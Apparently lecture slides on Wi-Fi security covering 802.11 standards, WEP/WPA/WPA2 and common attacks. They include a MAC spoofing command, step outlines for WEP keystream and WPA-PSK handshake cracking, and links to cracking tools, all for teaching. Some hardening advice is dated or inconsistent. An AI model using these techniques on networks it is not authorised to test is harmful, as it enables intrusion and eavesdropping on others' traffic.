Wireless Network Security

802.11 Standards

802.11a – 54 Mbps@5 GHz Not interoperable with 802.11b Limited distance Dual-mode APs require 2 chipsets, look like two APs to

clients Cisco products: Aironet 1200

802.11b – 11 Mbps@2.4 GHz Full speed up to 300 feet Coverage up to 1750 feet Cisco products: Aironet 340, 350, 1100, 1200

802.11g – 54 Mbps@2.4 GHz Same range as 802.11b Backward-compatible with 802.11b Speeds slower in dual-mode Cisco products: Aironet 1100, 1200

Wireless Network Security

802.11 Standards (Cont.)

802.11e – QoS Dubbed “Wireless MultiMedia (WMM)” by Wi-Fi Alliance

802.11i – Security Adds AES encryption Requires high cpu, new chips required TKIP is interim solution

802.11n –(2009) up to 300Mbps 5Ghz and/or 2.4Ghz ~230ft range

802.11ac – (under development) Will provide high through put in the 5 GHz band Will use wider RF bandwidth will enable multi-station WLAN throughput of at least 1 Gbps a maximum single link throughput of at least 500 Mbps

Wireless Network Security

Wireless Network Modes

The 802.11 wireless networks operate in two basic modes:1. Infrastructure mode2. Ad-hoc mode

Infrastructure mode: each wireless client connects directly to a central

device called Access Point (AP) no direct connection between wireless clients AP acts as a wireless hub that performs the

connections and handles them between wireless clients

Wireless Network Security

Wireless Network Modes (cont’d)

The hub handles: the clients’ authentication, Authorization link-level data security (access control and

enabling data traffic encryption) Ad-hoc mode:

Each wireless client connects directly with each other No central device managing the connections Rapid deployment of a temporal network where no

infrastructures exist (advantage in case of disaster…) Each node must maintain its proper authentication

list

Wireless Network Security

Security Threats

• Wireless technology doesn’t remove any old security issues, but introduces new ones– Viruses, Trojans and stuff like that are still there– Eavesdropping– Man-in-the-middle attacks– Denial of Service

Eavesdropping (Sniffing)

• Easy to perform, almost impossible to detect• By default, everything is transmitted in clear text

– Usernames, passwords, content ...– No security offered by the transmission

medium• Different tools available on the internet

– Network sniffers, protocol analysers . . .• With the right equipment, it’s possible to

eavesdrop traffic from few kilometers away

Wireless Man in the Middle (MITM) Attack

1. Attacker spoofes a disassociate message from the victim

2. The victim starts to look for a new access point, and the attacker advertises his own AP on a different channel, using the real AP’s MAC address

3. The attacker connects to the real AP using victim’s MAC address

In a MITM attack, the attacker funnels victim’s traffic through a point controlled by the attacker. Allows data analysis and manipulation

Denial of Service

• Frequency jamming– Not very technical, but works

• Spoofed deauthentication / disassociation messages– can target one specific user

• Attacks on higher levels– SYN Flooding– Ping of death– ...

SSID – Service Set Identification

Identifies a particular wireless network A client must set the same SSID as the one in that particular AP Point to

join the network Without SSID, the client won’t be able to select and join a wireless

network Hiding SSID is not a security measure because the wireless network in this

case is not invisible It can be defeated by intruders by sniffing it from any probe signal

containing it. So easy to find the ID for a “hidden” network because the beacon

broadcasting cannot be turned off Simply use a utility to show all the current networks:  

inSSIDer  NetStumbler  Kismet 

Wireless Network Security

IEEE 802.11 Security – Access control list

Access control list Simplest security measure Filtering out unknown users Requires a list of authorized clients’ MAC addresses to

be loaded in the AP Won’t protect each wireless client nor the traffic

confidentiality and integrity ===>vulnerable Defeated by MAC spoofing:

ifconfig eth0 hw ether 00:01:02:03:04:05 (Linux)SMAC - KLC Consulting (Windows)MAC Makeup - H&C Works (Windows)

Wireless Network Security

WEP - Wired Equivalent Privacy

The original native security mechanism for WLAN

Used to protect wireless communication from eavesdropping (confidentiality)(التنصت)

Prevent unauthorized access to a wireless network (access control)

Prevent tampering with transmitted messages (integrity)

Provide users with the equivalent level of privacy inbuilt in wireless networks.

Wireless Network Security

WEP1. Appends a 32-bit CRC checksum to each outgoing frame (INTEGRITY)

2. Encrypts the frame using RC4 stream cipher = 40-bit (standard) or 104-bit (Enhanced) keys + a 24-bit IV random initialization vector (CONFIDENTIALITY).

3. The Initialization Vector (IV) and default key on the station access point are used to create a key stream. The key stream is then used to convert the plain text message into the WEP encrypted frame.

Initialization Vector IV Dynamic 24-bit value Chosen randomly by the transmitter wireless network interface 16.7 million possible keys (224)

How WEP work

Wireless Network Security

RC4 keystream XORed with plaintext

XOR operation denoted as ⊕ plain-text ⊕ keystream= cipher-text cipher-text ⊕ keystream= plain-text plain-text ⊕ cipher-text= keystream

WEP Authentication

1. The station sends an authentication request to AP2. AP sends challenge text called nonce to the station.3. The station uses its configured 64-bit or 128-bit default key to

encrypt the nonce, and it sends the latter to AP.4. AP decrypts the encrypted nonce using its configured WEP key

that corresponds to the station's default key. 5. AP compares the decrypted nonce with the original nonce. 6. If the decrypted nonce matches the original nonce, then the

access point and the station share the same WEP key, and the access point authenticates the station.7. The station connects to the network.

17

WEP authentication problems

Plaintext attack• Attacker sniffs nonce (challenge), m, sent by AP• Attacker sniffs response sent by station:

– IV in clear– Encrypted nonce, c

• Attacker calculates keystream ks = m c, which is the keystream for the IV .

• Attacker then requests access to channel, receives nonce m’

• Attacker forms response c’ = ks m’ and IV• Server decrypts, matches m’ and declares

attacker authenticated !

WEP flaws and vulnerabilities

IV reuse and small size: There are 224 different IVs On a busy network, the IV will surely be reused, if the

default key has not been changed and the original message can be retrieved relatively easily.

With IV reuse, it is possible to determine keystreams and hence enable an attacker to forge packets obtaining access to the WLAN.

Wireless Network Security

Attacks on WEP

Wireless Network Security

WEP encrypted networks can be cracked in 10 minutes

Goal is to collect enough IVs to be able to crack the key

IV = Initialization Vector, plaintext appended to the key to avoid Repetition

Injecting packets generates IVs

Attacks on WEP

Backtrack 5 (Released 1st March 2012)

Tutorial is available

All required tools on a Linux bootable CD + laptop + wireless card

Wireless Network Security

WEP cracking example

Wireless Network Security

WPA – (WI-FI Protected Access)

New technique in 2002. Overcomes the security flaws of WEP.

Improved data encryption – Data is encrypted using the RC4 stream cipher, with a 128-bit key and a 48-bit initialization vector (IV). 248 is a large number! More than 500 trillion

Because of many attacks related to static key in WEP, WPA uses a Temporal Key Integrity Protocol (TKIP), which dynamically changes keys as the system is used. This combined with the much larger IV, defeats the well-known key recovery attacks on WEP.

A more secure message authentication code (usually known as a MAC, but here termed as MIC for "Message Integrity Code") is used in WPA, an algorithm named "Michael".

WPA2 - WI-FI Protected Access 2

Based on the IEEE 802.i standard 2 versions: Personal & Enterprise The primary enhancement over WPA is the use of the

AES (Advanced Encryption Standard) algorithm The encryption in WPA2 is done by utilizing either

AES or TKIP The Personal mode uses a PSK (Pre-shared key) &

does not require a separate authentication of users The enterprise mode requires the users to be

separately authenticated by using the EAP protocol

Wireless Network Security

Am I secure if I use WPA-PSK

WPA-PSK protected networks are vulnerable to dictionary attacks Works with WPA & WPA2 (802.11i) New attack techniques have increased the speed of this attack –

CowPatty (http://wirelessdefence.org/Contents/coWPAttyMain.htm ) Run CowPatty against packets to crack the key Needs SSID to crack the WPA-PSK, easily obtainable! Also supports WPA2-PSK cracking with the same pre-

computed tables! Spoof the Mac address of the AP and tell client to disassociate Sniff the wireless network for the WPA-PSK handshake (EAPOL)

Wireless Network Security

WPA Cracking Example

Wireless Network Security

Wireless Network tools

MAC Spoofing http://aspoof.sourceforge.net/ http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp http://www.klcconsulting.net/smac/

WEP Cracking tools http://www.backtrack-linux.org/ http://www.remote-exploit.org/articles/backtrack/index.html http://wepattack.sourceforge.net/ http://wepcrack.sourceforge.net/

Wireless Analysers http://www.kismetwireless.net/ http://www.netstumbler.com/

Wireless Network Security

Techniques to improve wireless security

Use wireless intrusion prevention system (WIPS)

Enable WPA-PSK

Use a good password (https://grc.com/password)

Use WPA2 where possible

AES is more secure, use TKIP for better performance

Change your SSID every so often

Wireless network users should use or upgrade their network to the latest released security standard